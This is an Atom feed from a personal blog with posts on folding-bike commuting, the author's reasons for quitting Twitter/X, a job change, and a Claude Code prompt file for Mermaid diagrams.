<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://blog.korny.info/feed.xml" rel="self" type="application/atom+xml" /><link href="https://blog.korny.info/" rel="alternate" type="text/html" /><updated>2026-04-19T19:06:56+01:00</updated><id>https://blog.korny.info/feed.xml</id><title type="html">Korny’s Blog</title><subtitle>The personal blog of Korny Sietsma</subtitle><author><name>Korny Sietsma</name></author><entry><title type="html">The Joy of Folding Bikes</title><link href="https://blog.korny.info/2026/04/19/the-joy-of-folding-bikes" rel="alternate" type="text/html" title="The Joy of Folding Bikes" /><published>2026-04-19T00:00:00+01:00</published><updated>2026-04-19T00:00:00+01:00</updated><id>https://blog.korny.info/2026/04/19/the-joy-of-folding-bikes</id><content type="html" xml:base="https://blog.korny.info/2026/04/19/the-joy-of-folding-bikes"><![CDATA[<p>I was chatting to a friend about my folding bike and I had the urge to write about it - because this falls in the category of “Things I wish I’d had decades ago”. And maybe I can encourage some others to try these wonderful devices.</p>

<p class="notice--info">Note: I’m 3 months into a new job so blogging has taken a back seat to drinking from a firehose of new domain knowledge, new people, new tech. I’m still playing with AI-assisted coding, but at a slower pace - I do hope to blog more about this when things calm down.</p>

<p>12 years ago I started cycling in London, commuting by train, and I used the bicycle hire scheme mis-named at the time “Boris Bikes”.  It was <em>OK</em> but a bit of a hassle - bikes were heavy, payment was fiddly, and often the hire racks would be empty in the morning and full in the evening.</p>

<p>So I followed the advice of other commuters and got this beautiful device - it cost £1000 at the time, a fair bit of money, but on a Ride to Work scheme I could pay this weekly over a year, so it was £4 a week, pre-tax, which made it quite affordable.</p>

<p><img src="/assets/images/2026-04-19-the-joy-of-folding-bikes/brompton_feb_2015.png" alt="Red Brompton folding bike" /></p>

<p>It’s a Brompton - and they are a marvellous brand, but I don’t want to just say “Get a Brompton” as I’m sure other brands must be competing in this space - and Bromptons are pricey. So do your own research.</p>

<p>I also (after a couple of annoying flats) got puncture-proof Schwalbe Marathon Plus tyres - and I haven’t had a single puncture since.</p>

<p>And like I said at the start - I <em>so</em> wish I’d had something like this years and years ago. So many years of commuting in Melbourne where I’d walk slowly to a station, or drive to a station and have to cram into busy parking.  So many years where my bike would languish in a shed, probably with flat tyres because I only got it out on specific “exercise” attempts.</p>

<p>The folding bike:</p>
<ul>
  <li>Lives in my study.  I have a nicer bike in the shed but almost never get it out because the bike in my study is so convenient.</li>
  <li>Can be carried in one hand - it’s heavy, about 12kg plus bags, but that’s ok for short distances.</li>
  <li>Can go on the train - this is the biggest benefit, commuting is <em>so</em> much easier when you can go cycle -&gt; train -&gt; cycle.  Most trains, even ones with “no bikes” rules, allow them - they aren’t any bigger than a large suitcase.</li>
  <li>Never gets punctures.</li>
  <li>Can go in the boot of the car easily - when I get the car serviced, I drive to the garage, then cycle home, and cycle back to the garage at the end of the day.</li>
  <li>Can be carried in to the office or cafes or shops - no locking it on the street; a big benefit in London where bike thieves are everywhere and tend to carry bolt cutters or angle grinders!</li>
</ul>

<p>I do have a lock - a folding ‘silver’ grade Abus Bordo lock that mounts on the bike. But I only really use it in my home town where thieves are much rarer, or on the very rare occasion when I want to go into a cafe and there isn’t room for the bike - and then only if I can sit with the bike in eyeshot!</p>

<p>I get it serviced every year or two. And after 11 years, it’s had nothing major go wrong - a few cable replacements and the like, but it still has the original frame, wheels, and  gears.  That’s pretty impressive for 11 years of commuting, though post-Covid I only tend to commute one day a week.</p>

<p>For a lot of people this should be fairly simple economics. Our station parking is £10 a day - current Brompton prices start at £1400 - so even ignoring pre-tax schemes and savings in other transport like the underground, a Brompton would pay for itself in 140 working days, or 28 weeks for the poor folks still commuting every day.</p>

<p>Plus I just love the freedom of cycling, and the exercise!</p>

<p class="notice--info">#protip If cycling in one of <a href="https://www.cyclestreets.net/area/">the supported areas</a> the free <a href="https://www.cyclestreets.net/">Cycle Streets app</a> is marvellous. It uses Open StreetMap data so users can update it when roads change, and lets you choose quiet vs fast routes. People ask me if cycling in London is safe - it’s fine if you use an app like this to avoid the worst roads, and ride sensibly with a bit of care about passing trucks or busses, and (gasp) actually obey traffic signals.</p>]]></content><author><name>Korny Sietsma</name></author><category term="Personal" /><category term="exercise" /><category term="cycling" /><category term="climate" /><summary type="html"><![CDATA[I was chatting to a friend about my folding bike and I had the urge to write about it - because this falls in the category of “Things I wish I’d had decades ago”. And maybe I can encourage some others to try these wonderful devices. Note: I’m 3 months into a new job so blogging has taken a back seat to drinking from a firehose of new domain knowledge, new people, new tech. I’m still playing with AI-assisted coding, but at a slower pace - I do hope to blog more about this when things calm down. 12 years ago I started cycling in London, commuting by train, and I used the bicycle hire scheme mis-named at the time “Boris Bikes”. It was OK but a bit of a hassle - bikes were heavy, payment was fiddly, and often the hire racks would be empty in the morning and full in the evening. So I followed the advice of other commuters and got this beautiful device - it cost £1000 at the time, a fair bit of money, but on a Ride to Work scheme I could pay this weekly over a year, so it was £4 a week, pre-tax, which made it quite affordable. It’s a Brompton - and they are a marvellous brand, but I don’t want to just say “Get a Brompton” as I’m sure other brands must be competing in this space - and Bromptons are pricey. So do your own research. 
I also (after a couple of annoying flats) got puncture-proof Schwalbe Marathon Plus tyres - and I haven’t had a single puncture since. And like I said at the start - I so wish I’d had something like this years and years ago. So many years of commuting in Melbourne where I’d walk slowly to a station, or drive to a station and have to cram into busy parking. So many years where my bike would languish in a shed, probably with flat tyres because I only got it out on specific “exercise” attempts. The folding bike: Lives in my study. I have a nicer bike in the shed but almost never get it out because the bike in my study is so convenient. Can be carried in one hand - it’s heavy, about 12kg plus bags, but that’s ok for short distances. Can go on the train - this is the biggest benefit, commuting is so much easier when you can go cycle -&gt; train -&gt; cycle. Most trains, even ones with “no bikes” rules, allow them - they aren’t any bigger than a large suitcase. Never gets punctures Can go in the boot of the car easily - when I get the car serviced, I drive to the garage, then cycle home, and cycle back to the garage at the end of the day. Can be carried in to the office or cafes or shops - no locking it on the street; a big benefit in London where bike thieves are everywhere and tend to carry bolt cutters or angle grinders! I do have a lock - a folding ‘silver’ grade Abus Bordo lock that mounts on the bike. But I only really use it in my home town where thieves are much rarer, or on the very rare case where I want to go in a cafe and there isn’t room for the bike - but only if I can sit with the bike in eyeshot! I get it serviced every year or two. And after 11 years, it’s had nothing major go wrong - a few cable replacements and the like, but it still has the original frame, wheels, and gears. That’s pretty impressive for 11 years of commuting, though post-Covid I only tend to commute one day a week. For a lot of people this should be fairly should be simple economics. 
Our station parking is £10 a day - current Brompton prices start at £1400 - so even ignoring pre-tax schemes and savings in other transport like the underground, a Brompton would pay for itself in 140 working days, or 28 weeks for the poor folks still commuting every day. Plus I just love the freedom of cycling, and the exercise! #protip If cycling in one of the supported areas the free Cycle Streets app is marvellous. It uses Open StreetMap data so users can update it when roads change, and lets you choose quiet vs fast routes. People ask me if cycling in London is safe - it’s fine if you use an app like this to avoid the worst roads, and ride sensibly with a bit of care about passing trucks or busses, and (gasp) actually obey traffic signals.]]></summary></entry><entry><title type="html">Refusing to use Twitter</title><link href="https://blog.korny.info/2026/01/25/refusing-to-use-twitter" rel="alternate" type="text/html" title="Refusing to use Twitter" /><published>2026-01-25T00:00:00+00:00</published><updated>2026-01-25T00:00:00+00:00</updated><id>https://blog.korny.info/2026/01/25/refusing-to-use-twitter</id><content type="html" xml:base="https://blog.korny.info/2026/01/25/refusing-to-use-twitter"><![CDATA[<p><img src="/assets/images/2026-01-25-refusing-to-use-twitter/no-twitter.png" alt="No Twitter" class="align-left" style="display: inline; height: 2.0em; vertical-align: middle;" /> <img src="/assets/images/2026-01-25-refusing-to-use-twitter/no-x.png" alt="No X" class="align-left" style="display: inline; height: 2.0em; vertical-align: middle;" /></p>

<p>I’ve completely stopped using Twitter (now called X) and I wanted to post something explaining why.</p>

<p>I stopped posting or reading the feeds quite a while ago, but despite most people I know agreeing it’s a terrible place, friends persist in sharing X posts and I get lured in to reading them. But no more. If you send me a Twitter/X link, I’ll either ignore it or politely ask you to share the content another way; or flag my unhappiness by using an emoji like <img src="/assets/images/2026-01-25-refusing-to-use-twitter/no-x.png" alt="No X" style="display: inline; height: 1.2em; vertical-align: middle;" />.</p>

<h2 id="this-isnt-really-a-boycott">This isn’t really a boycott</h2>

<p>I should be clear about what I’m doing here. This isn’t a traditional boycott where I hope that removing my business will cost them money. X has vast resources behind it - Musk’s wealth, the backing of the Trump administration - and I don’t expect it to go away. I don’t expect meaningful economic damage from people like me leaving, except perhaps in the very long term.</p>

<p>What I do expect is that reasonable, rational, human-oriented people will increasingly not want to have meaningful conversations there. The platform has become hostile to genuine conversation - with algorithms optimised for outrage, polluted with lying bots and engagement-bait, owned by someone who uses it as a weapon.</p>

<p>So yes, I hope my friends and the communities I participate in will move elsewhere too. Not because we’ll bankrupt Musk, but because I’d rather have real conversations somewhere that isn’t… this. And as long as you talk there, you’re perpetuating the idea that this is somehow a valid place for conversation.</p>

<h2 id="the-problem-with-just-browsing">The problem with “just browsing”</h2>

<p>People have used tracking blockers and screenshots of posts to avoid promoting the site - but the problem is not about boosting their metrics or making them money, it’s the fact that viewing keeps legitimising the place. Every view makes the platform seem more legitimate, more relevant, more “the place where we discuss things”. It’s similar to why I won’t read the Daily Mail - even sharing something genuinely good from there helps legitimise a platform that does tremendous harm, and it’s hard to distinguish the truth from the half-truth from the utter lies.</p>

<p>There’s a story that’s been circulating for years about a bartender who kicks out a polite, well-dressed Nazi before he’s done anything wrong. When asked why, the bartender explains: you serve one, they become a regular, they bring friends, the friends bring friends, and before you know it you’re running a <a href="https://en.wiktionary.org/wiki/Nazi_bar">Nazi bar</a>. By then it’s too late - they’re entrenched and everyone else has left.</p>

<p>X has become the Nazi bar. The owner himself is boosting far-right content, doing salutes at rallies, and platforming fascists across the globe. Having a reasonable conversation there is like trying to have a quiet drink in a bar where the landlord is doing Nazi salutes behind the counter. Even if your particular corner seems fine, you’re still in the Nazi bar.</p>

<h2 id="what-x-has-become">What X has become</h2>

<p>I thought it was worth cataloguing a few of the worst examples of where things have gone.</p>

<h3 id="destabilising-democracies">Destabilising democracies</h3>

<p>In January 2025, Elon Musk launched an <a href="https://www.npr.org/2025/01/07/g-s1-41296/starmer-attacks-elon-musk">unprecedented attack on the UK government</a>, posting over 100 times about UK politics with posts reaching more than 100 million views. He <a href="https://www.cnn.com/2025/01/06/uk/starmer-musk-child-sex-abuse-intl-gbr">falsely accused</a> Prime Minister Keir Starmer of being “deeply complicit in mass rapes”, called a government minister a “rape genocide apologist”, demanded Starmer’s imprisonment, and ran a poll asking if America should “liberate the people of Britain from their tyrannical government.”</p>

<p>He has <a href="https://fortune.com/europe/2025/01/09/elon-musk-reportedly-discussed-strategies-oust-keir-starmer-uk-pm-before-next-election/">discussed strategies to oust Starmer</a> before the next election and <a href="https://www.aljazeera.com/news/2025/1/3/who-is-tommy-robinson-and-why-is-elon-musk-throwing-his-weight-behind-him">called for the release of Tommy Robinson</a>, a far-right activist serving an 18-month prison sentence.</p>

<p>This isn’t just about the UK. Musk has <a href="https://www.npr.org/2025/01/27/nx-s1-5276084/elon-musk-german-far-right-afd-holocaust">endorsed Germany’s far-right AfD party</a>, telling Germans to move beyond “past guilt” over the Nazi era - a comment that <a href="https://www.nbcnews.com/news/world/elon-musks-call-germany-move-nazi-guilt-dangerous-holocaust-memorial-c-rcna189316">drew condemnation from the chairman of Israel’s Holocaust memorial</a>. He has <a href="https://www.nbcnews.com/news/world/elon-musk-europe-surging-far-right-rcna185145">boosted far-right movements in at least 18 countries</a>.</p>

<h3 id="a-firehose-of-lies">A firehose of lies</h3>

<p>Musk’s <a href="https://www.cnn.com/2024/11/04/media/elon-musk-election-x-misinformation-trump-harris/index.html">misleading election claims</a> during the 2024 US election generated over 2 billion views. PolitiFact <a href="https://www.politifact.com/article/2024/oct/23/2-weeks-450-posts-how-elon-musk-uses-his-x-profile/">analysed 450+ of his posts</a> over two weeks and found he promoted misleading or inaccurate content on most days. His misinformation <a href="https://www.nbcnews.com/tech/misinformation/musk-election-misinformation-x-officials-twitter-voting-rcna176938">travels hundreds of times further</a> than fact-checks from officials, and Community Notes failed to display corrections on 74% of his misleading election posts.</p>

<h3 id="enabling-fascism">Enabling fascism</h3>

<p>At Trump’s inauguration in January 2025, Musk made a <a href="https://www.washingtonpost.com/technology/2025/01/21/elon-musk-salute-trump-inauguration/">straight-arm gesture</a> that was widely interpreted as a Nazi salute. While some defended it as awkward enthusiasm, historian Ruth Ben-Ghiat called it “a Nazi salute - and a very belligerent one too.” Neo-Nazi groups celebrated it as such. The gesture is illegal in Germany.</p>

<p>Beyond the gestures, X itself has become a propaganda machine. Multiple studies show the algorithm <a href="https://www.avclub.com/twitter-x-amplifying-right-wing-accounts">systematically amplifies right-wing content</a> - even politically neutral new accounts get <a href="https://sciencemediacentre.es/en/independent-research-shows-xs-twitters-algorithm-can-influence-political-polarisation">twice as much right-wing content as left-wing</a>. Research during the 2024 election found the algorithm <a href="https://link.springer.com/article/10.1140/epjds/s13688-024-00456-3">amplifies hostile, emotionally aggressive political content</a> - and when that content is pushed down, people actually warm up to the opposing side.</p>

<p>X has become the platform of choice for government propaganda. Internal ICE communications <a href="https://www.washingtonpost.com/technology/interactive/2025/ice-social-media-blitz/">obtained by the Washington Post</a> show officials coordinating with the White House to create viral arrest videos, debating which “hardcore” music to use as soundtracks, and asking “should we feed info to an influencer?” A former DHS press secretary called it “propaganda, creating fear” and “meme-ification of things that are life or death.”</p>

<h3 id="enabling-sexual-abuse-through-ai">Enabling sexual abuse through AI</h3>

<p>Perhaps most disturbing is what happened with Grok, X’s AI chatbot. In late December 2025, users discovered that Grok could be prompted to <a href="https://www.washingtonpost.com/technology/2026/01/06/x-grok-deepfake-sexual-abuse/">“digitally undress” women in photos</a>, creating non-consensual sexual deepfakes. This became what Reuters described as a “mass digital undressing spree” - at its peak, <a href="https://www.cnn.com/2026/01/08/tech/elon-musk-xai-digital-undressing">Grok was producing sexualized images at a rate of roughly one per minute</a>.</p>

<p>Even worse, there were <a href="https://www.cbsnews.com/news/grok-safeguard-lapses-minors-minimal-clothing-ai/">cases where Grok generated sexualized images of minors</a>. Grok itself had to post an apology stating it had created “an AI image of two young girls (estimated ages 12-16) in sexualized attire.”</p>

<p>X’s response? <a href="https://www.nbcnews.com/tech/internet/x-paywall-ai-image-grok-app-bikini-allows-sexual-deepfakes-rcna252647">Restrict the feature to paying users</a> - meaning people could still create non-consensual imagery if they paid for the privilege. Indonesia and Malaysia have banned the chatbot entirely, and the <a href="https://www.pbs.org/newshour/show/musks-grok-ai-faces-more-scrutiny-after-generating-sexual-deepfake-images">UK’s Ofcom has launched a formal investigation</a>. X have since apparently backed down … after much pressure, and only in this one area.</p>

<h2 id="why-dont-i-just-ignore-it">Why don’t I just ignore it?</h2>

<p>Why post this at all? Why use <img src="/assets/images/2026-01-25-refusing-to-use-twitter/no-x.png" alt="No X" style="display: inline; height: 0.8em; vertical-align: middle;" /> emojis and other passive-aggressive stuff? Aren’t I being rude and oppressing other people’s right to free speech?</p>

<p>Because this stuff is important; the world is in a terrible state and I think people have passively let things get worse and worse with minimal response. I’m not stopping your free speech - just pointing out that you are posting your free speech in a Nazi pub and I’m not going to listen; in fact, I’m going to remind you that you are doing so. Feel free to ignore me - but if you value my conversation at all, consider finding another source of that information to share.</p>

<h2 id="where-ill-be-instead">Where I’ll be instead</h2>

<p>I’m still on <a href="https://hachyderm.io/@korny">Mastodon</a> and <a href="https://bsky.app/profile/korny.info">Bluesky</a>, and those are where I’d love to see more people. I’m also willing to tolerate Instagram and Threads - Facebook/Meta are certainly no paragons of virtue, but at least they aren’t as openly, gleefully horrible as what X has become. There’s a difference between “problematic tech company” and “actively working to destabilise democracies while enabling the creation of child sexual abuse material.” Or <a href="https://www.linkedin.com/in/korny/">LinkedIn</a> if you don’t mind the somewhat false corporate sheen over the whole place.</p>

<h2 id="mourning-old-twitter">Mourning old Twitter</h2>

<p>Just to be clear: I’m sad about this. Twitter was amazing when it was new - so much open debate and discussion and information. I read and posted huge amounts there in the 2010s and early 2020s and while I haven’t participated for a while, I still miss it.</p>

<p>But that Twitter is gone. What wears its skin is something else entirely - a platform optimised for engagement-bait, algorithmic amplification of outrage, and the political projects of its <a href="https://en.wikipedia.org/wiki/Broligarchy">broligarch</a> owner.</p>

<p>I can’t pretend otherwise anymore, and I can’t keep feeding it with my attention.</p>

<hr />

<p>If you want to discuss this post, please reply to <a href="https://hachyderm.io/@Korny/115957135117935614">my post on Mastodon</a> or <a href="https://bsky.app/profile/korny.sietsma.com/post/3mdbe3j76mk2q">my post on Bluesky</a> (I’m doing both as one is more free, one is more convenient for many people)</p>]]></content><author><name>Korny Sietsma</name></author><category term="World" /><category term="Personal" /><category term="politics" /><category term="social-media" /><category term="twitter" /><category term="x" /><summary type="html"><![CDATA[I’ve completely stopped using Twitter (now called X) and I wanted to post something explaining why. I stopped posting or reading the feeds quite a while ago, but despite most people I know agreeing it’s a terrible place, friends persist in sharing X posts and I get lured in to reading them. But no more. If you send me a Twitter/X link, I’ll either ignore it or politely ask you to share the content another way; or flag my unhappiness by using an emoji like . This isn’t really a boycott I should be clear about what I’m doing here. This isn’t a traditional boycott where I hope that removing my business will cost them money. X has vast resources behind it - Musk’s wealth, the backing of the Trump administration - and I don’t expect it to go away. I don’t expect meaningful economic damage from people like me leaving, except perhaps in the very long term. What I do expect is that reasonable, rational, human-oriented people will increasingly not want to have meaningful conversations there. The platform has become hostile to genuine conversation - with algorithms optimised for outrage, polluted with lying bots and engagement-bait, owned by someone who uses it as a weapon. So yes, I hope my friends and the communities I participate in will move elsewhere too. Not because we’ll bankrupt Musk, but because I’d rather have real conversations somewhere that isn’t… this. 
And as long as you talk there, it’s perpetuating that somehow this is a valid place for conversation. The problem with “just browsing” People have used tracking blockers and screenshots of posts to avoid promoting the site - but the problem is not about boosting their metrics or making them money, it’s the fact that viewing keeps legitimising the place. Every view makes the platform seem more legitimate, more relevant, more “the place where we discuss things”. It’s similar to why I won’t read the Daily Mail - even sharing something genuinely good from there helps legitimise a platform that does tremendous harm, and it’s hard to distinguish the truth from the half-truth from the utter lies. There’s a story that’s been circulating for years about a bartender who kicks out a polite, well-dressed Nazi before he’s done anything wrong. When asked why, the bartender explains: you serve one, they become a regular, they bring friends, the friends bring friends, and before you know it you’re running a Nazi bar. By then it’s too late - they’re entrenched and everyone else has left. X has become the Nazi bar. The owner himself is boosting far-right content, doing salutes at rallies, and platforming fascists across the globe. Having a reasonable conversation there is like trying to have a quiet drink in a bar where the landlord is doing Nazi salutes behind the counter. Even if your particular corner seems fine, you’re still in the Nazi bar. What X has become I thought it was worth cataloguing a few of the worst examples of where things have gone Destabilising democracies In January 2025, Elon Musk launched an unprecedented attack on the UK government, posting over 100 times about UK politics with posts reaching more than 100 million views. 
He falsely accused Prime Minister Keir Starmer of being “deeply complicit in mass rapes”, called a government minister a “rape genocide apologist”, demanded Starmer’s imprisonment, and ran a poll asking if America should “liberate the people of Britain from their tyrannical government.” He has discussed strategies to oust Starmer before the next election and called for the release of Tommy Robinson, a far-right activist serving an 18-month prison sentence. This isn’t just about the UK. Musk has endorsed Germany’s far-right AfD party, telling Germans to move beyond “past guilt” over the Nazi era - a comment that drew condemnation from the chairman of Israel’s Holocaust memorial. He has boosted far-right movements in at least 18 countries. A firehose of lies Musk’s misleading election claims during the 2024 US election generated over 2 billion views. PolitiFact analysed 450+ of his posts over two weeks and found he promoted misleading or inaccurate content on most days. His misinformation travels hundreds of times further than fact-checks from officials, and Community Notes failed to display corrections on 74% of his misleading election posts. Enabling fascism At Trump’s inauguration in January 2025, Musk made a straight-arm gesture that was widely interpreted as a Nazi salute. While some defended it as awkward enthusiasm, historian Ruth Ben-Ghiat called it “a Nazi salute - and a very belligerent one too.” Neo-Nazi groups celebrated it as such. The gesture is illegal in Germany. Beyond the gestures, X itself has become a propaganda machine. Multiple studies show the algorithm systematically amplifies right-wing content - even politically neutral new accounts get twice as much right-wing content as left-wing. Research during the 2024 election found the algorithm amplifies hostile, emotionally aggressive political content - and when that content is pushed down, people actually warm up to the opposing side. X has become the platform of choice for government propaganda. 
Internal ICE communications obtained by the Washington Post show officials coordinating with the White House to create viral arrest videos, debating which “hardcore” music to use as soundtracks, and asking “should we feed info to an influencer?” A former DHS press secretary called it “propaganda, creating fear” and “meme-ification of things that are life or death.” Enabling sexual abuse through AI Perhaps most disturbing is what happened with Grok, X’s AI chatbot. In late December 2025, users discovered that Grok could be prompted to “digitally undress” women in photos, creating non-consensual sexual deepfakes. This became what Reuters described as a “mass digital undressing spree” - at its peak, Grok was producing sexualized images at a rate of roughly one per minute. Even worse, there were cases where Grok generated sexualized images of minors. Grok itself had to post an apology stating it had created “an AI image of two young girls (estimated ages 12-16) in sexualized attire.” X’s response? Restrict the feature to paying users - meaning people could still create non-consensual imagery if they paid for the privilege. Indonesia and Malaysia have banned the chatbot entirely, and the UK’s Ofcom has launched a formal investigation. X have since apparently backed down … after much pressure, and only in this one area. Why don’t I just ignore it? Why post this at all? Why use emojis and other passive-agressive stuff? Aren’t I being rude and oppressing other people’s right to free speech? Because this stuff is important; the world is in a terrible state and I think people have passively let things get worse and worse with minimal response. I’m not stopping your free speech - just pointing out that you are posting your free speech in a Nazi pub and I’m not going to listen, in fact I’m going to remind you that you are doing so. Feel free to ignore me - but if you value my conversation at all, consider finding another source of that information to share. 
Where I’ll be instead I’m still on Mastodon and Bluesky, and those are where I’d love to see more people. I’m also willing to tolerate Instagram and Threads - Facebook/Meta are certainly no paragons of virtue, but at least they aren’t as openly, gleefully horrible as what X has become. There’s a difference between “problematic tech company” and “actively working to destabilise democracies while enabling the creation of child sexual abuse material.” Or LinkedIn if you don’t mind the somewhat false corporate sheen over the whole place. Mourning old Twitter Just to be clear: I’m sad about this. Twitter was amazing when it was new - so much open debate and discussion and information. I read and posted huge amounts there in the 2010s and early 2020s and while I haven’t participated for a while, I still miss it. But that Twitter is gone. What wears its skin is something else entirely - a platform optimised for engagement-bait, algorithmic amplification of outrage, and the political projects of its broligarch owner. I can’t pretend otherwise anymore, and I can’t keep feeding it with my attention. If you want to discuss this post, please reply to my post on Mastodon or my post on Bluesky (I’m doing both as one is more free, one is more convenient for many people)]]></summary></entry><entry><title type="html">New year, new everything</title><link href="https://blog.korny.info/2026/01/17/new-year-new-everything" rel="alternate" type="text/html" title="New year, new everything" /><published>2026-01-17T00:00:00+00:00</published><updated>2026-01-17T00:00:00+00:00</updated><id>https://blog.korny.info/2026/01/17/new-year-new-everything</id><content type="html" xml:base="https://blog.korny.info/2026/01/17/new-year-new-everything"><![CDATA[<p>I haven’t posted in 3 months! 
That’s partly because I put a lot of work into the <a href="https://martinfowler.com/articles/agentic-ai-security.html">extended version of my Agentic AI security post on martinfowler.com</a> - and partly because, since posting that, I have changed jobs. After 2 years at Liberis I’ve decided to move on - on Monday I start a new position as a Principal Engineer at <a href="https://en.wikipedia.org/wiki/John_Lewis_Partnership">John Lewis Partnership</a>!</p>

<p>I’m quite excited about the new position - John Lewis Partnership are a fascinating organisation - employee owned and with quite a strong set of <a href="https://www.jlpjobs.com/about-the-partnership/">values and ethics</a>, and their software engineering group sounds like they have a good culture - I especially like their <a href="https://engineering-principles.jlp.engineering/">published engineering principles</a>.</p>

<p>But as a result of this, most of my spare time in the last 3 months was taken up with the job process, and then winding up and handing over work at Liberis has kept me busy - as well as all the usual chaos of Christmas. I’ve still been having lots of fun playing with Agentic AI tools, keeping up with the changes, rolling my eyes at the hype.</p>

<p>It is traditional in a new year to ruminate on the state of things - and there’s a lot to ruminate on.  We seem to be in a time of huge change.</p>

<p>AI is both a blessing and a curse. The AI hype continues - I have a whole draft blog post about “AI Hype 2.0” which I hope to write some day - but despite being annoyed at the hype, I have to admit AI tools have changed my work drastically. In October 2023 I was <a href="/2023/10/31/playing-with-rust-and-copilot">posting here</a> about how Cursor was handy but couldn’t really tackle complex rust code - I don’t think I would have believed you if you’d told me that in 2 years I’d be using AI assistance for pretty well all my software development - and most of my non-development work as well.</p>

<p>But - AI slop and misuse is a huge risk, as is the IP theft in so much creative AI use, as is the high risk of the AI bubble bursting, and the fact that horrible tech-bro fascist-leaning maniacs are profiting from all this.  And they are burning fossil fuels to power the engines behind this. (see also my standard <a href="/ai-disclaimer/">AI Disclaimer</a>)</p>

<p>Meanwhile governments are sliding towards fascism and imperialism, while funding the horrible tech oligarchs … it’s all a mess. While the planet burns. There are glimmers of hope, but it’s tough times and going to be horrible times for many people.</p>

<p>I don’t really have time or space to talk a lot about this right now, but I don’t want to ignore it and just post blithely about neat stuff I’ve done with rust scripts. The world is a mess and we all need to think about and talk about and work towards trying to fix it.</p>

<p>Happy 2026 and I hope it’s a good one for y’all out there!</p>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="World" /><category term="Personal" /><category term="ai" /><category term="tech" /><category term="work" /><category term="politics" /><summary type="html"><![CDATA[I haven’t posted in 3 months! That’s partly because I put a lot of work into the extended version of my Agentic AI security post on martinfowler.com - and partly as since posting that I have changed jobs. After 2 years at Liberis I’ve decided to move on - on Monday I start a new position as a Principal Engineer at John Lewis Partnership! I’m quite excited about the new position - John Lewis Partnership are a fascinating organisation - employee owned and with quite a strong set of values and ethics, and their software engineering group sounds like they have a good culture - I especially like their published engineering principles. But as a result of this, most of my spare time in the last 3 months was taken up with the job process, and then winding up and handing over work at Liberis has kept me busy - as well as all the usual chaos of Christmas. I’ve still been having lots of fun playing with Agentic AI tools, keeping up with the changes, rolling my eyes at the hype. It is traditional in a new year to ruminate on the state of things - and there’s a lot to ruminate on. We seem to be in a time of huge change. AI is both a blessing and a curse. The AI hype continues - I have a whole draft blog post about “AI Hype 2.0” which I hope to write some day - but despite being annoyed at the hype, I have to admit AI tools have changed my work drastically. In October 2023 I was posting here about how Cursor was handy but couldn’t really tackle complex rust code - I don’t think I would have believed you if you’d told me that in 2 years I’d be using AI assistance for pretty well all my software development - and most of my non-development work as well. 
But - AI slop and misuse is a huge risk, as is the IP theft in so much creative AI use, as is the high risk of the AI bubble bursting, and the fact that horrible tech-bro fascist-leaning maniacs are profiting from all this. And they are burning fossil fuels to power the engines behind this. (see also my standard AI Disclaimer) Meanwhile governments are sliding towards fascism and imperialism, while funding the horrible tech oligarchs … it’s all a mess. While the planet burns. There are glimmers of hope, but it’s tough times and going to be horrible times for many people. I don’t really have time or space to talk a lot about this right now, but I don’t want to ignore it and just post blithely about neat stuff I’ve done with rust scripts. The world is a mess and we all need to think about and talk about and work towards trying to fix it. Happy 2026 and I hope it’s a good one for y’all out there!]]></summary></entry><entry><title type="html">Agent Mermaid reporting for duty</title><link href="https://blog.korny.info/2025/10/10/agent-mermaid-reporting-for-duty" rel="alternate" type="text/html" title="Agent Mermaid reporting for duty" /><published>2025-10-10T00:00:00+01:00</published><updated>2025-10-10T00:00:00+01:00</updated><id>https://blog.korny.info/2025/10/10/agent-mermaid-reporting-for-duty</id><content type="html" xml:base="https://blog.korny.info/2025/10/10/agent-mermaid-reporting-for-duty"><![CDATA[<p><em>Note</em> see also my standard <a href="/ai-disclaimer/">AI Disclaimer</a></p>

<p class="notice--info"><strong>Update:</strong> This post was updated to use the latest Mermaid version, and a few other tweaks.</p>

<p><img src="/assets/images/2025-10-10-agent-mermaid-reporting-for-duty/mermaid_logo.svg" alt="svg picture of a mermaid with sunglasses on" /><sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup></p>

<h2 id="introduction">Introduction</h2>

<p>My last few posts have been rather theoretical; this one is back to a “here is how I solved a problem” post.</p>

<p>A while ago I <a href="/2025/03/14/mermaid-js-revisited">blogged about better ways to make Mermaid diagrams</a> but that was in the “before times” when I would do these things by hand, like a savage. OK I still edit them by hand - but LLMs like Claude Code are pretty good at drawing Mermaid - it’s just text, after all.</p>

<p>However, out of the box, Claude is trained on sample mermaid code in the wild - so it doesn’t always know the latest syntax, recent additions, or my own preferences. So this is a classic scenario where prompting can help.</p>

<h2 id="the-basic-prompt">The basic prompt</h2>

<p>My first attempt at this just embedded all my Mermaid preferences in a markdown file I could load. Note I load this <em>as needed</em> - I don’t always want to draw Mermaid diagrams, and a key thing we are all discovering about agentic LLM tools is <em>don’t pollute the context</em> - the more things you tell Claude about, the worse it performs. So for Mermaid I have a prompt command <code class="language-plaintext highlighter-rouge">/better-mermaid</code> that loads all my settings into the current session. If I start a new session, or run <code class="language-plaintext highlighter-rouge">/clear</code>, all that noise is gone.</p>

<p>My prompt starts:</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gh"># Mermaid.js Guide for Claude Code</span>

This is an advanced guide to building mermaid diagrams

<span class="gu">## My preferences</span>
<span class="p">
-</span> I like light backgrounds, so any text displayed on the background should be black or dark
<span class="p">-</span> For text on shapes, you should make sure that either you use light text on a dark shape, or dark text on a light shape.

<span class="gu">## Quick Reference</span>
<span class="p">
-</span> <span class="gs">**Hand-drawn look**</span>: Add <span class="sb">`config: look: handDrawn`</span> in frontmatter
<span class="p">-</span> <span class="gs">**Invisible subgraphs**</span>: Use <span class="sb">`classDef invisible fill:#0000,stroke:#0000;`</span>
<span class="p">-</span> <span class="gs">**New shape syntax**</span>: <span class="sb">`NodeName@{shape: diamond, label: "Decision"}`</span>
<span class="p">-</span> <span class="gs">**Common shapes**</span>: rect, rounded, diamond (decisions), cyl (database), doc (document), hex (process), trap-b (trapezoid), lean-r (I/O)
</code></pre></div></div>

<p><a href="/assets/files/2025-10-10-agent-mermaid-reporting-for-duty/mermaid-basic.md">Here is the full file</a>.</p>

